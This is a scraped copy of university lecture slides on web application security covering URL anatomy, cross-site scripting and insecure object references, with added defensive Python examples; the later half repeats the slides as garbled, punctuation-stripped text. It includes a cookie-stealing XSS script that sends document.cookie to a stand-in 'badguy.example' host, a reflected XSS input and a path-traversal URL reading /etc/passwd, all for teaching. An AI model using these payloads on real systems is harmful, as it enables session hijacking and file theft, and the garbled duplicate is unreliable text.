Full URLs specified in RFC 3986 have up to eight parts

URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment

1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)

Parts 3-5 together are called the authority

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names are assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL adhoc schemes in browsersEacute eg javascript about config

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

?search=purple+bananas

Optional; intended to pass arbitrary parameters to the resource. The commonly used syntax

name1=value1&name2=value2

is not part of URL syntax: that syntax comes from mail and HTML forms. So:

- the server may not presume/enforce a query string format
- web applications may legally use other forms after ?

Fragment identifier

#lastsection

- Interpretation depends on client, resource type
  - in practice: anchor names in HTML elements
- Not intended to be sent to server
- Recent use: store client-side state while browsing
  - can be changed without page reload
  - easily bookmarked, shared
  - e.g. map locations

Exercise: Find some uses of fragments on web pages and servers. See what happens if they are sent to the server.

Metacharacters

- Some punctuation characters are not allowed
  - e.g. [ ] $ & ( ) =
- These are URL encoded with percent-ASCII hex
  - e.g. %2F encodes /, %25 encodes %

The RFC does not specify a fixed mapping, and browsers try to interpret as many user inputs as possible.

E.g. examples like http://%65xample.%63om/ may work in some browsers but not others. Some browsers will canonicalize the authority part of the URL, then even try a search (foo.com, www.foo.com, ...).

The RFCs are not always followed.

Non-ASCII text encodings in URLs

- Original standards did not allow for non-ASCII text
  - but clearly desirable for non-English text
- RFC 3492 introduced Punycode to allow a behind-the-scenes DNS lookup
  - DNS lookup: xn--[US-ASCII]-[Unicode]
  - Browser: display Unicode part

Extension of 38 characters to 100,000 glyphs allowed many homograph attacks:

- pea.com has 5 identical-looking Cyrillic chars
- there are non-slash characters that look like /
- some attacks not easily prevented by DNS registrars

We have (puny) browser, search engine defences for this. Moral: probably better to stick with ASCII.
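Two of the defences browsers and registrars apply can be shown in a few lines. This is an added example for these notes (not code from the slides or from the cited texts): it converts a host to the xn-- form RFC 3492 sends to DNS, flags labels that mix scripts, and flags an all-Cyrillic label such as the pea.com case whose every letter has an ASCII look-alike, which a mixed-script rule alone would miss. The confusables table is a small hand-picked subset constructed for the example; a real check would load the full Unicode confusables data.

```python
"""Two cheap defensive checks for look-alike (homograph) host names.

Added example for these notes, not code from the slides or the cited
texts. CONFUSABLES is a small constructed subset of the Unicode
confusables data; a real check should load the full UTS #39 table.
"""
import unicodedata

# Cyrillic letters whose glyphs coincide with Latin ones (constructed subset).
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0456": "i",
}


def to_ascii(host):
    """The xn-- form actually sent to DNS (RFC 3492 Punycode via IDNA)."""
    return host.encode("idna").decode("ascii")


def label_scripts(label):
    """Scripts used in one DNS label, read off the Unicode character names."""
    scripts = set()
    for ch in label:
        if ch.isascii() and (ch.isdigit() or ch == "-"):
            continue  # digits and hyphens belong to every script
        name = unicodedata.name(ch, "UNKNOWN")
        scripts.add(name.split()[0])  # LATIN, CYRILLIC, GREEK, ...
    return scripts


def skeleton(label):
    """Replace known confusables with the Latin letter they resemble."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in label)


def homograph_risk(host):
    """None for an unremarkable host, otherwise why it looks suspicious.

    'mixed-script' catches a Latin name with a single Cyrillic letter;
    'ascii-lookalike' catches an all-Cyrillic label whose every letter
    resembles ASCII, which the mixed-script rule alone lets through.
    """
    for label in host.lower().split("."):
        if label.isascii():
            continue
        if len(label_scripts(label)) > 1:
            return "mixed-script"
        if skeleton(label).isascii():
            return "ascii-lookalike"
    return None
```

A Latin label with a diacritic (for instance a German umlaut) passes both checks, since it is single-script and its skeleton is still non-ASCII; only names that could be mistaken for a different ASCII name are flagged.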

Overall consequences

Parsing URLs: more complicated than one might hope.

- better to use well-tested libraries than ad hoc code

But for output, want to be very careful:

- especially if URLs are made from user (attacker) input
- should canonicalize, then filter, reformat
- filter especially on the scheme and authority

Overall consequences

Eyeballs can easily be fooled when looking at URLs. This is bad for ordinary users as well as web app developers.

http://example.com&gibberish=1234@167772161/

http://example.com\@coredump.cx/

http://example.com;.coredump.cx/

Which server is visited by each of these URLs?

Exercise: Try (carefully) visiting these URLs or others similar. Try asking some non-CS friends whose servers URLs like 'www.barclays.banking.com' go to.

Examples from The Tangled Web.
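The "canonicalize, then filter on scheme and authority" advice, worked through for the URLs above. This is an added example for these notes, not code from the slides or from The Tangled Web. It assumes a link policy of: http or https only, no credentials in the authority, and a host that is an ASCII DNS name, a canonical dotted-quad IPv4 address or a bracketed IPv6 literal. canonical_ipv4 decodes the legacy numeric forms (hex, octal and short forms such as 0x7f.1, and plain decimal such as 167772161) that browsers still accept, so that effective_host shows where a URL really goes and safe_link can reject those disguises.

```python
"""Canonicalise and filter URLs before emitting them as links.

Added example for these lecture notes; it is not code from the slides or
from either cited book. It assumes a link policy of: http or https only,
no credentials in the authority, and a host that is an ASCII DNS name, a
canonical dotted-quad IPv4 address or a bracketed IPv6 literal.
"""
import ipaddress
import re
from urllib.parse import urlsplit, urlunsplit

ALLOWED_SCHEMES = {"http", "https"}
DEFAULT_PORTS = {"http": 80, "https": 443}
DNS_NAME = re.compile(
    r"^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*$")


def _ipv4_component(part):
    """Parse one dotted component as legacy resolvers do:
    0x prefix means hex, a leading 0 means octal, otherwise decimal."""
    if not part or not (part.isascii() and part.isalnum()):
        raise ValueError(part)
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def canonical_ipv4(host):
    """Dotted-quad form of a legacy numeric IPv4 literal, or None.

    With fewer than four components the last one fills the remaining
    bytes, so '0x7f.1' is 127.0.0.1 and '167772161' is 10.0.0.1.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_ipv4_component(p) for p in parts]
    except ValueError:
        return None
    *head, last = nums
    width = 4 - len(head)  # bytes covered by the last component
    if any(n > 255 for n in head) or last >= 256 ** width:
        return None
    value = 0
    for n in head:
        value = (value << 8) | n
    value = (value << (8 * width)) | last
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def effective_host(url):
    """The host a browser would actually connect to, IPv4 canonicalised."""
    host = urlsplit(url).hostname
    if host is None:
        return None
    return canonical_ipv4(host) or host


def safe_link(url):
    """Return the canonical form of url if it passes the policy, else None.

    Filtering is on scheme and authority, where the eyeball-fooling tricks
    live; path, query and fragment are passed through unchanged.
    """
    try:
        parts = urlsplit(url.strip())
        port = parts.port  # ValueError on a non-numeric port
    except ValueError:
        return None
    scheme = parts.scheme
    host = parts.hostname  # already lower-cased, IPv6 brackets removed
    if scheme not in ALLOWED_SCHEMES or not host:
        return None
    if parts.username is not None or parts.password is not None:
        return None  # "example.com&gibberish=1234@" is really a user name
    if ":" in host:
        try:
            netloc = "[%s]" % ipaddress.IPv6Address(host)
        except ValueError:
            return None
    else:
        canon = canonical_ipv4(host)
        if canon is not None and canon != host:
            return None  # 0x7f.1, 2130706433 and similar disguises
        if not DNS_NAME.match(host):
            return None  # punctuation or non-ASCII in the name
        netloc = host
    if port is not None and port != DEFAULT_PORTS[scheme]:
        netloc = "%s:%d" % (netloc, port)
    return urlunsplit((scheme, netloc, parts.path or "/", parts.query, parts.fragment))
```

Note that the library parser is used for splitting (as the slides recommend) and the policy is applied to the parsed parts, never to the raw string; the backslash example above is deliberately left out of the checks, since browsers disagree about it and Python's parser does not treat it as a separator.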

Outline

- Overview
- Essential Basics: URLs
- Output Filtering and XSS
- Object references
- Summary

Underlying problem for XSS

ALWAYS CHECK YOUR OUTPUTS

XSS attacks in general

- Attack typically on (another) user of the web app
- Attacker tricks app into displaying malicious code
  - typically script code

Many possible aims:

- display random images, popup windows
- change page contents, e.g. alter bank account number
- session hijacking: steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script:

<script>document.location.replace("http://www.badguy.example/steal.php" + "?what=" + document.cookie)</script>

- redirects victim's browser to attacker's site, passing cookie
- might also pass currently visited web page
  - then attacker's server can issue a redirect back again

Reflected XSS

Reflected XSS occurs when the injected malicious code isn't stored in the server but is immediately displayed in the visited page. Suppose

http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc

dynamically makes HTML embedding title directly:

<h1>Man GCC</h1>

An attacker could use this with a malicious input

title=<script>...</script>&program=gcc

which e.g. steals a cookie.

Exercise: Explain how this attack works in practice.

XSS Solutions

Input processing: tricky, need to understand data flow through the app (quoting, encoding, passed to/from functions, databases, etc.). Hence: output filtering.

Plain output: HTML encoding

- Stored data values need to be encoded to represent in HTML (e.g. < converted to &lt; etc.)

Marked up output: complex filtering

- Need to work through tags in input and rule out risky ones. Scripts may appear in attributes. Flaky.

Marked up output: DSL

- A better approach: use a dedicated syntax, convert to a restricted subset of HTML
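The two recommended output strategies, plain encoding and a DSL, beside the manpage.php pattern that causes the reflected XSS above. This is an added example for these notes, not code from the slides or the cited texts: render_title_unsafe is the flawed pattern, render_title_safe and render_manpage apply HTML encoding, and render_markup is a constructed two-token mini-language (*bold* and _italic_) whose only way to produce a tag is through its grammar, so the output is confined to a fixed subset of HTML.

```python
"""Output filtering against XSS: encode plain values, and render marked-up
text through a small DSL instead of passing HTML through.

Added example for these notes, not code from the slides or the cited
texts. manpage.php is the slide's scenario; the *bold* / _italic_
mini-language is constructed for the example.
"""
import html
import re
from urllib.parse import parse_qs, urlsplit


def render_title_unsafe(title):
    """The pattern behind reflected XSS: user data pasted straight into HTML."""
    return "<h1>%s</h1>" % title


def render_title_safe(title):
    """Plain output: HTML-encode the value, so < > & \" ' cannot open markup."""
    return "<h1>%s</h1>" % html.escape(title)


def render_manpage(url):
    """Take the title parameter from a manpage.php-style URL and render it
    with encoding applied; a <script> in the parameter stays visible text."""
    title = parse_qs(urlsplit(url).query).get("title", [""])[0]
    return render_title_safe(title)


# Marked-up output via a DSL: the only way to produce a tag is through this
# grammar, so output is confined to <p>, <strong>, <em> and encoded text.
_TOKEN = re.compile(r"\*([^*\n]+)\*|_([^_\n]+)_")


def render_markup(text):
    """Convert *bold* and _italic_ to HTML; everything else is encoded."""
    paragraphs = []
    for para in text.split("\n\n"):
        pieces, pos = [], 0
        for m in _TOKEN.finditer(para):
            pieces.append(html.escape(para[pos:m.start()]))
            if m.group(1) is not None:
                pieces.append("<strong>%s</strong>" % html.escape(m.group(1)))
            else:
                pieces.append("<em>%s</em>" % html.escape(m.group(2)))
            pos = m.end()
        pieces.append(html.escape(para[pos:]))
        paragraphs.append("<p>%s</p>" % "".join(pieces))
    return "\n".join(paragraphs)
```

The DSL approach needs no list of "risky" tags at all, which is what makes it less flaky than filtering: even text inside the bold markers is encoded, so raw HTML in the input never reaches the output.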

Outline

- Overview
- Essential Basics: URLs
- Output Filtering and XSS
- Object references
- Summary

Embarrassing PHP blunders

http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction

A "cool" PHP script, showhtml.php:

- take a plain HTML file
- wrap it with navigation links, site style
- convert the internal links to reference back to the wrapped version

Embarrassing PHP blunders

http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%25passwd

- remote users can visit any file on the system
- mistake motivates defence-in-depth:
  - http server should not serve up any file
  - use internal web server config (separate apps)
  - and external OS config (e.g. nobody user, chroot)

Authorization and object access

What was the problem here?

- the app developer (implicitly) authorized users to read documentation files he had created
  - project was open source, no need for logins
  - app contained no paths to files outside the project
  - so no explicit authorization code was written
- but PHP code didn't check the filename returned
  - showhtml.php provided access to server objects
  - input validation only checked for file existence

There should have been a re-authorization step. A well-written app should only allow access to its own resources.

Looking at anyone's bank account

<form action="show-account.asp" method="get">
Account to display:
<select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>

Example from Innocent Code, based on a Norwegian newspaper story about a "17-year-old geek able to view anyone's bank account".

Solutions for object referencing

Re-validate:

- Check authorization again
- Obvious solution, but duplicates effort

Add a data indirection:

- Session-specific server side array of account nos.

<option value="1">12345678901</option>
<option value="2">12346543210</option>

- Similarly for file access:

http://research.site.ed.ac.uk/showhtml.php?file=1#Introduction

for many files, a hash table or database could be used.
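The data indirection above, together with the "only its own resources" rule from the showhtml.php discussion, in working form. This is an added example for these notes, not code from the slides or the cited texts. ObjectRefs is the session-specific table behind the <option value="1"> handles; project_file is the re-authorization step showhtml.php lacked, confining any requested file to the project directory. The account numbers are the slide's sample values; DOC_ROOT is a constructed path.

```python
"""Indirect object references and a path-confinement check.

Added example for these notes, not the slides' code. It models the
session-specific table of account numbers suggested above and, for the
showhtml.php case, confines file access to the project's own directory.
The account numbers are the slide's sample values; DOC_ROOT is a
constructed path.
"""
import os

DOC_ROOT = "/srv/showhtml"  # constructed: where the wrapped HTML files live


class ObjectRefs:
    """Per-session map from short opaque handles to real identifiers.

    The client only sees handles (1, 2, ...), as in the <option> values
    above; the real account number or path never leaves the server, so
    there is no field a user can edit into somebody else's value.
    """

    def __init__(self):
        self._objects = []

    def expose(self, real_id):
        """Register an object this session's user is allowed to reach."""
        self._objects.append(real_id)
        return len(self._objects)  # 1-based handle

    def resolve(self, handle):
        """Map a handle back to the real identifier; unknown handles and
        anything that is not a handle (including a real id) give None."""
        try:
            index = int(handle)
        except (TypeError, ValueError):
            return None
        if 1 <= index <= len(self._objects):
            return self._objects[index - 1]
        return None


def project_file(requested, base_dir=DOC_ROOT):
    """Resolve a requested file under base_dir, or None if it escapes.

    realpath collapses '..' and follows symlinks, so the check is made on
    the path that would really be opened, not on the string the client
    sent. An absolute path such as /etc/passwd replaces base_dir in the
    join and is therefore rejected by the same test.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def inside_doc_root(requested):
    """Convenience predicate: would project_file() allow this request?"""
    return project_file(requested) is not None


def show_account(refs, handle):
    """What show-account.asp should do: accept only a session handle."""
    account = refs.resolve(handle)
    if account is None:
        return "no such account"
    return "account %s" % account
```

Both halves make the same point in different ways: ObjectRefs removes the real identifier from the client entirely, while project_file keeps the identifier but re-checks it against what the app is allowed to serve; the second is the defence-in-depth to keep even when the first is in place.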

Passing too much information

Old flaw: passing unnecessary information to the client and expecting it back unmodified.

<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="/templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>

Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.

Example: editing a wiki page

<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText"></textarea>
</form>

Solution: add a MAC constructed with a server-side secret key:

<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">

Or could encrypt the pagename.
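The MAC solution for the wiki form, as an added example for these notes (not code from the slides or the cited texts). SERVER_SECRET is a constructed placeholder; a real key is generated randomly and kept in server-side configuration. HMAC-SHA256 is used here; the slide's 40-hex-digit tag has the length of HMAC-SHA1 output, which works the same way. The field name is bound into the tag so that a tag issued for pagename cannot be replayed as a tag for a different field.

```python
"""Protecting a hidden form field with a MAC.

Added example for these notes, not from the slides or the cited texts.
SERVER_SECRET is a constructed placeholder (a real one is generated
randomly and kept in server-side configuration).
"""
import hashlib
import hmac
import html

SERVER_SECRET = b"constructed-example-key-not-for-deployment"


def field_mac(name, value, key=SERVER_SECRET):
    """Tag the pair (name, value). Including the field name means a tag
    issued for pagename cannot be replayed as a tag for another field;
    the NUL separator keeps distinct (name, value) pairs from colliding."""
    message = name.encode("utf-8") + b"\x00" + value.encode("utf-8")
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def hidden_fields(name, value, mac_name=None):
    """The two hidden <input> elements the server emits in the form;
    values are HTML-encoded so the field cannot break out of the tag."""
    mac_name = mac_name or name + "mac"
    return (
        '<input type="hidden" name="%s" value="%s">\n'
        '<input type="hidden" name="%s" value="%s">'
        % (html.escape(name), html.escape(value),
           html.escape(mac_name), field_mac(name, value))
    )


def accept_field(name, value, mac, key=SERVER_SECRET):
    """True only when the client returned exactly the value the server
    issued. compare_digest avoids leaking the tag through timing."""
    if not isinstance(mac, str) or not mac.isascii():
        return False
    return hmac.compare_digest(field_mac(name, value, key), mac)
```

On submission the server recomputes the tag from the returned pagename and compares it to the returned pagemac; any edit to either field, or a tag lifted from another field, fails the check. The MAC proves integrity but not secrecy, which is why the slide offers encryption as the alternative when the value itself must stay hidden.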

Other authorization mistakes

Assuming requests occur in proper order:

- For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
  - only checking authorization on the first step

Authorization by obscurity:

- Supposing that, because a web page is not linked to the main site, only people who are given it will be able to reach it

http://www.myserver.com/secretarea/privatepaper.pdf

Outline

- Overview
- Essential Basics: URLs
- Output Filtering and XSS
- Object references
- Summary

Review questions

URLs

- Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output, to protect your users?

XSS

- Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?

Object references

- Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

References

Some commentary and examples were taken from the texts:

- Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby, Wiley 2004
- The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski, No Starch Press 2012

as well as the named RFCs.

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 4: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

OWASP Top 10 List

Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Structure of URLs

Full URLs specified in RFC 3986 have up to eight parts

URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment

1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)

Parts 3-5 together are called the authority

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names are assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL adhoc schemes in browsersEacute eg javascript about config

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 5: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Structure of URLs

Full URLs specified in RFC 3986 have up to eight parts

URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment

